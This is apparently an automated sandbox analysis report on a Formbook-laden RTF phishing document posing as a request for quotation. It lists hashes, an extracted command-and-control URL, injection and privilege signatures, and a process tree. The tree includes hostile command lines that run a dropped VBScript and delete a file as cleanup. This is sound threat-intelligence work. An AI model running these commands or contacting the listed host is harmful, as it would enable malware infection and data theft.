Analysis
max time kernel: 148s
max time network: 25s
platform: windows7_x64
resource: win7v20201028
submitted: 18-01-2021 16:49

Static task: static1

Behavioral task: behavioral1
Sample: RFQ-450987643.doc.rtf
Resource: win7v20201028

Behavioral task: behavioral2
Sample: RFQ-450987643.doc.rtf
Resource: win10v20201028

General
Target: RFQ-450987643.doc.rtf
Size: 1.5MB
MD5: d1e131610fac2e4923e4b41c143930c0
SHA1: b697187ded059e330e334e8959b500b2720b7498
SHA256: fe0ebbec69296e6fa9073104bb2f1448bdeeeb040511af7b3bad04fa529da38c
SHA512: b013702eb35285c77b950023b86e8f1a30648a7fbc7e3a89edb9bd3df17506cd33ba4f92f35998db637e7fc1a9b5d72a756957a21a825c202cc48e16ed0d4852
Malware Config
Extracted
formbook
http://www.priscilafiorini.com/rcm/
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: Powershell.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 600 | 540 | Powershell.exe |
Formbook Payload 3 IoCs
Processes:
resource | yara_rule
behavioral1/memory/1692-25-0x000000000041EBE0-mapping.dmp | formbook
behavioral1/memory/1692-24-0x0000000000400000-0x000000000042E000-memory.dmp | formbook
behavioral1/memory/1400-34-0x0000000000080000-0x00000000000AE000-memory.dmp | formbook
Blocklisted process makes network request 4 IoCs
Processes: Powershell.exe
flow | pid | process
7 | 600 | Powershell.exe
9 | 600 | Powershell.exe
11 | 600 | Powershell.exe
13 | 600 | Powershell.exe
Drops file in System32 directory 1 IoCs
Processes: Powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | Powershell.exe
Suspicious use of SetThreadContext 3 IoCs
Processes: Powershell.exe, rundll32.exe, chkdsk.exe
description | pid | process | target process
PID 600 set thread context of 1692 | 600 | Powershell.exe | rundll32.exe
PID 1692 set thread context of 1252 | 1692 | rundll32.exe | Explorer.EXE
PID 1400 set thread context of 1252 | 1400 | chkdsk.exe | Explorer.EXE
Drops file in Windows directory 1 IoCs
Processes: WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs
Processes: chkdsk.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | chkdsk.exe
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
Processes: WINWORD.EXE
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: WINWORD.EXE
pid | process
2028 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes: Powershell.exe, rundll32.exe, chkdsk.exe
pid | process | count
600 | Powershell.exe | 8
1692 | rundll32.exe | 2
1400 | chkdsk.exe | 25
Suspicious behavior: MapViewOfSection 5 IoCs
Processes: rundll32.exe, chkdsk.exe
pid | process | count
1692 | rundll32.exe | 3
1400 | chkdsk.exe | 2
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes: Powershell.exe, rundll32.exe, chkdsk.exe
description | pid | process | count
Token: SeDebugPrivilege | 600 | Powershell.exe | 3
Token: SeIncreaseQuotaPrivilege | 600 | Powershell.exe | 2
Token: SeSecurityPrivilege | 600 | Powershell.exe | 2
Token: SeTakeOwnershipPrivilege | 600 | Powershell.exe | 2
Token: SeLoadDriverPrivilege | 600 | Powershell.exe | 2
Token: SeSystemProfilePrivilege | 600 | Powershell.exe | 2
Token: SeSystemtimePrivilege | 600 | Powershell.exe | 2
Token: SeProfSingleProcessPrivilege | 600 | Powershell.exe | 2
Token: SeIncBasePriorityPrivilege | 600 | Powershell.exe | 2
Token: SeCreatePagefilePrivilege | 600 | Powershell.exe | 2
Token: SeBackupPrivilege | 600 | Powershell.exe | 2
Token: SeRestorePrivilege | 600 | Powershell.exe | 2
Token: SeShutdownPrivilege | 600 | Powershell.exe | 2
Token: SeSystemEnvironmentPrivilege | 600 | Powershell.exe | 2
Token: SeRemoteShutdownPrivilege | 600 | Powershell.exe | 2
Token: SeUndockPrivilege | 600 | Powershell.exe | 2
Token: SeManageVolumePrivilege | 600 | Powershell.exe | 2
Token: 33 | 600 | Powershell.exe | 2
Token: 34 | 600 | Powershell.exe | 2
Token: 35 | 600 | Powershell.exe | 2
Token: SeDebugPrivilege | 1692 | rundll32.exe | 1
Token: SeDebugPrivilege | 1400 | chkdsk.exe | 1
Suspicious use of FindShellTrayWindow 4 IoCs
Processes: Explorer.EXE
pid | process | count
1252 | Explorer.EXE | 4
Suspicious use of SendNotifyMessage 4 IoCs
Processes: Explorer.EXE
pid | process | count
1252 | Explorer.EXE | 4
Suspicious use of SetWindowsHookEx 2 IoCs
Processes: WINWORD.EXE
pid | process | count
2028 | WINWORD.EXE | 2
Suspicious use of WriteProcessMemory 26 IoCs
Processes: EQNEDT32.EXE, CmD.exe, Powershell.exe, Explorer.EXE, chkdsk.exe
description | pid | process | target process | count
PID 1968 wrote to memory of 1824 | 1968 | EQNEDT32.EXE | CmD.exe | 4
PID 1824 wrote to memory of 1776 | 1824 | CmD.exe | cscript.exe | 4
PID 600 wrote to memory of 1692 | 600 | Powershell.exe | rundll32.exe | 10
PID 1252 wrote to memory of 1400 | 1252 | Explorer.EXE | chkdsk.exe | 4
PID 1400 wrote to memory of 772 | 1400 | chkdsk.exe | cmd.exe | 4
Processes
C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-450987643.doc.rtf"
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
  C:\Windows\SysWOW64\chkdsk.exe
    Command line: "C:\Windows\SysWOW64\chkdsk.exe"
    - Suspicious use of SetThreadContext
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      Command line: /c del "C:\WINDOWS\syswow64\rundll32.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\CmD.exe
    Command line: CmD.exe /C cscript %tmp%\Client.vbs AC
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cscript.exe
      Command line: cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\WINDOWS\syswow64\rundll32.exe
    Command line: "{path}"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\Client.vbs
MD5: 29ac0bc0477f704733355d037e3c4910
SHA1: 885244aeead819518e9b7a358cc153e511865e50
SHA256: 22ecd31ded12e74c247368edfdf112653c8c2e555e2f90837e98e9591e145f06
SHA512: b4ecece80ca5e8985d407ad51ce303c5587691e3b290b4c660b7f91a6b62bf9d77931a614e2c0a5640bc3de5f96141d457b1cf3eb04433bc6064c9476430ba3b